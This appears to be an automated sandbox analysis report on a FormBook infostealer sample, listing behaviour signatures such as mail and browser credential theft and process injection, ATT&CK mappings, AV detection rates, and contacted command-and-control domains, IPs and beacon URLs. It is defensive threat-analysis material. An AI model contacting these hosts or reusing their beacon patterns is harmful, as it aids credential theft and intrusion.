            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\netsh.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.yZcecBUXN7.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4125352041.00000000055B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1897755674.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4122807420.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123925036.0000000001320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4123058161.0000000000F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1898683610.0000000001020000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4123873184.0000000002960000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1899804288.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            File and Directory Discovery            		Remote Services11
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		11
            Deobfuscate/Decode Files or Information            		LSASS Memory13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)412
            Process Injection            		1
            Abuse Elevation Control Mechanism            		Security Account Manager21
            Security Software Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook41
            Obfuscated Files or Information            		NTDS2
            Process Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets51
            Virtualization/Sandbox Evasion            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Timestomp            		Cached Domain Credentials1
            Application Window Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
            File Deletion            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Masquerading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron51
            Virtualization/Sandbox Evasion            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
            Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd412
            Process Injection            		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1435169 Sample: yZcecBUXN7.exe Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 28 www.yamiyasheec.online 2->28 30 www.vavada-band.ru 2->30 32 19 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 6 other signatures 2->48 10 yZcecBUXN7.exe 3 2->10         started        signatures3 process4 signatures5 60 Injects a PE file into a foreign processes 10->60 13 yZcecBUXN7.exe 10->13         started        process6 signatures7 62 Maps a DLL or memory area into another process 13->62 16 jBaxmaKIzqHZYEOPQcTTJTXx.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netsh.exe 13 16->19         started        process10 signatures11 50 Tries to steal Mail credentials (via file / registry access) 19->50 52 Tries to harvest and steal browser information (history, passwords, etc) 19->52 54 Deletes itself after installation 19->54 56 3 other signatures 19->56 22 jBaxmaKIzqHZYEOPQcTTJTXx.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.quantummquest.top 203.161.50.127, 49754, 49755, 49756 VNPT-AS-VNVNPTCorpVN Malaysia 22->34 36 www.whirledairlines.com 216.40.34.41, 49750, 49751, 49752 TUCOWSCA Canada 22->36 38 10 other IPs or domains 22->38 58 Found direct / indirect Syscall (likely to bypass EDR) 22->58 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            yZcecBUXN7.exe29%ReversingLabs
            yZcecBUXN7.exe38%VirustotalBrowse
            yZcecBUXN7.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            vavada-band.ru4%VirustotalBrowse
            www.dhleba51.ru2%VirustotalBrowse
            applesolve.com1%VirustotalBrowse
            www.bettaroom.ru3%VirustotalBrowse
            dainikmirpur.com0%VirustotalBrowse
            www.applesolve.com1%VirustotalBrowse
            www.dainikmirpur.com0%VirustotalBrowse
            bnbuotqakx.shop5%VirustotalBrowse
            www.vavada-band.ru7%VirustotalBrowse
            www.vaesen.net1%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=100%Avira URL Cloudmalware
            http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg=0%Avira URL Cloudsafe
            http://www.whirledairlines.com/0hhg/0%Avira URL Cloudsafe
            http://www.applesolve.com/0hhg/0%Avira URL Cloudsafe
            http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.whirledairlines.com/0hhg/0%VirustotalBrowse
            http://www.applesolve.com/0hhg/2%VirustotalBrowse
            http://www.dk48.lol/0hhg/0%Avira URL Cloudsafe
            http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc=0%Avira URL Cloudsafe
            http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo=0%Avira URL Cloudsafe
            http://www.bnbuotqakx.shop/0hhg/100%Avira URL Cloudmalware
            http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4=0%Avira URL Cloudsafe
            http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX0%Avira URL Cloudsafe
            https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rC0%Avira URL Cloudsafe
            http://www.quantummquest.top/0hhg/0%Avira URL Cloudsafe
            http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.dainikmirpur.com/0hhg/0%Avira URL Cloudsafe
            http://www.yamiyasheec.online/0hhg/0%Avira URL Cloudsafe
            http://www.dhleba51.ru/0hhg/100%Avira URL Cloudmalware
            http://www.xxaiai.top/0hhg/0%Avira URL Cloudsafe
            http://www.dainikmirpur.com/0hhg/0%VirustotalBrowse
            http://www.quantummquest.top/0hhg/1%VirustotalBrowse
            http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJ0%Avira URL Cloudsafe
            http://www.yamiyasheec.online/0hhg/3%VirustotalBrowse
            http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=100%Avira URL Cloudmalware
            http://www.bnbuotqakx.shop100%Avira URL Cloudmalware
            http://www.bettaroom.ru/0hhg/0%Avira URL Cloudsafe
            http://www.dhleba51.ru/0hhg/4%VirustotalBrowse
            http://www.cucuzeus88.store/0hhg/0%Avira URL Cloudsafe
            http://www.bettaroom.ru/0hhg/8%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            vavada-band.ru
            		148.251.36.121
            		truefalseunknown
            cucuzeus88.store
            		153.92.8.41
            		truefalse
              		unknown
              www.quantummquest.top
              		203.161.50.127
              		truefalse
                		unknown
                www.dhleba51.ru
                		195.24.68.5
                		truefalseunknown
                applesolve.com
                		188.116.38.155
                		truefalseunknown
                parkingpage.namecheap.com
                		91.195.240.19
                		truefalse
                  		high
                  www.bettaroom.ru
                  		194.58.112.173
                  		truefalseunknown
                  bnbuotqakx.shop
                  		101.99.93.157
                  		truefalseunknown
                  www.xxaiai.top
                  		108.186.8.158
                  		truefalse
                    		unknown
                    dainikmirpur.com
                    		192.250.235.36
                    		truefalseunknown
                    www.whirledairlines.com
                    		216.40.34.41
                    		truefalse
                      		unknown
                      yamiyasheec.online
                      		119.18.54.116
                      		truefalse
                        		unknown
                        www.applesolve.com
                        		unknown
                        		unknowntrueunknown
                        www.cucuzeus88.store
                        		unknown
                        		unknowntrue
                          		unknown
                          www.bnbuotqakx.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.dainikmirpur.com
                            		unknown
                            		unknowntrueunknown
                            www.dk48.lol
                            		unknown
                            		unknowntrue
                              		unknown
                              www.cluird.cloud
                              		unknown
                              		unknowntrue
                                		unknown
                                www.yamiyasheec.online
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.vavada-band.ru
                                  		unknown
                                  		unknowntrueunknown
                                  www.vaesen.net
                                  		unknown
                                  		unknowntrueunknown

                                  Contacted URLs

                                  NameMaliciousAntivirus DetectionReputation
                                  http://www.whirledairlines.com/0hhg/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yamiyasheec.online/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=XN/uN6nMvrGkpcBz+Thv1jYaxJtcZ3guzCEwk+wO1IePrLEfQ2dONhxJJ5MfI8SrhyY28ykjUI4nvFFhDsPQuo7fansGo7O9hSpOWy12njMGsYSDFVmwrLg=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dhleba51.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=bCD+TBjy8MosL0R8cjbFvxriDyPYhKFZsDVB2lzqkrb80jeseZ1xwY0K4Gv6crRSCTRNIEUsU3Jqelj2oHAe6QPTv8GQpjovQK3uiYXh6MxwvjeFy3ewRNM=false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoX+Rn6aHsZLnu3NGBe2VBUm0fUZsnu3sABaHfjqCa4r+GKRPsyPs5e5gNT6h7MvS/nYKUeSlb7fRS9PCej43uXu++wSLzang=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.applesolve.com/0hhg/false
                                  • 2%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dk48.lol/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dk48.lol/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=Np3vqe/1Cu/OQ51upJR8Qsht1t6ybRV+pU7NEwPzo+CdnJXCrwJJ0q4TeA3yrjOGKQp+qts/DZNdYR5Nz+PtVR15bhmDHV5jmEZsuo4OBXvm+mP+YyhGbOc=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.xxaiai.top/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=4PSEdCTPIXdKXl7uh+LsBTwAtAbEEDmKYAJsxyVVq9bdmcYGjB9JHSE/ykX4VkYbcxwnxSFcyayelsVtdhVYibhKvsL7bWoBJw77jiRnpeIfkNF5+PYwYCo=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.bnbuotqakx.shop/0hhg/false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.whirledairlines.com/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=OATZzJPiUUGU3mpjZciWUPZeXbT2MJCMteYhXkaeth47OgAuOtH7Ax1R5cSUzc8K7tJsdCLV7T20xyzul8wSbYrVofQNfqyssPuErqT1NUPeqaem3KrcSI4=false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quantummquest.top/0hhg/false
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.quantummquest.top/0hhg/?ABqDW6A8=nDs+4sFgmC14rZAzdMtU+fOluyCTVoLAn9AW6ezlSd5l//pRDkDNUYKtMPmQp3hOJuHIoac+nQZfVGszaQStOPCeLqTfiXL51+ke6KS/qQDP30/ytVZd2Oc=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dainikmirpur.com/0hhg/false
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.yamiyasheec.online/0hhg/false
                                  • 3%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dhleba51.ru/0hhg/false
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.xxaiai.top/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.dainikmirpur.com/0hhg/?ABqDW6A8=3wBFJopWm5CMrZiTyKtS+1p+7hjS88lkxUD6z9EbhjEDI4ONso69BWfj9WDOW8yAnPP5dxxY4Y59DXJqqTyKGc0G8sgHpv85TbqwFJKqhW0zFRgOzIl1BwU=&nNWXI=ybhXiHipjHJfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.vavada-band.ru/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=ZgUGIv2SFtjYSXZ+sPWjrnmi9x4JTSAxK/4wkC6FqAYJ2g+qpBbYR3pK2HW+0dFnzG0fITqUvE2Gc/Yp1eE4tJw0C8fQ5yYHj2xbYtSMWmtqetVE9PQCI40=false
                                  • Avira URL Cloud: malware
                                  		unknown
                                  http://www.bettaroom.ru/0hhg/false
                                  • 8%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.cucuzeus88.store/0hhg/false
                                  • Avira URL Cloud: safe
                                  		unknown

                                  URLs from Memory and Binaries

                                  NameSourceMaliciousAntivirus DetectionReputation
                                  https://duckduckgo.com/chrome_newtabnetsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/ac/?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.instagram.com/hover_domainsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                        		high
                                        https://www.nic.ru/catalog/ssl/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://www.nic.ru/jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              http://push.zhanzhang.baidu.com/push.jsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                		high
                                                https://www.hover.com/email?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  https://www.hover.com/about?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    		high
                                                    https://www.nic.ru/catalog/domains/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://www.nic.ru/help/oshibka-404_8500.htmlnetsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://www.hover.com/domains/resultsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://www.nic.ru/catalog/hosting/shared/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            		high
                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.cssnetsh.exe, 00000004.00000002.4124592339.000000000492E000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003D3E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                		high
                                                                https://www.hover.com/tools?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://help.hover.com/home?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    		high
                                                                    https://yastatic.net/pcode/adfox/loader.jsnetsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.hover.com/domain_pricing?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.hover.com/privacy?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://twitter.com/hovernetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            		high
                                                                            http://applesolve.com/0hhg/?ABqDW6A8=vkFwZ006WdHbpHCmjjBOYDeoXnetsh.exe, 00000004.00000002.4124592339.0000000004C52000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000004062000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://www.hover.com/transfer_in?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.hover.com/renew?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.cucuzeus88.store/0hhg/?nNWXI=ybhXiHipjHJ&ABqDW6A8=nRUqMZh05AeT5XBXy6tvbUigcs6hc4rCnetsh.exe, 00000004.00000002.4124592339.000000000542C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.000000000483C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://zz.bdstatic.com/linksubmit/push.jsnetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.0000000004DE4000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.00000000041F4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.nic.ru/catalog/hosting/dedicated/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.ecosia.org/newtab/netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://ac.ecosia.org/autocomplete?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://www.nic.ru/catalog/hosting/vds-vps/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.hover.com/tos?source=parkednetsh.exe, 00000004.00000002.4126359612.0000000006640000.00000004.00000800.00020000.00000000.sdmp, netsh.exe, 00000004.00000002.4124592339.000000000479C000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003BAC000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://www.bnbuotqakx.shopjBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4125352041.0000000005661000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: malware
                                                                                              		unknown
                                                                                              https://www.nic.ru/catalog/hosting/netsh.exe, 00000004.00000002.4124592339.0000000004478000.00000004.10000000.00040000.00000000.sdmp, jBaxmaKIzqHZYEOPQcTTJTXx.exe, 00000007.00000002.4123946344.0000000003888000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netsh.exe, 00000004.00000002.4126442386.0000000008078000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
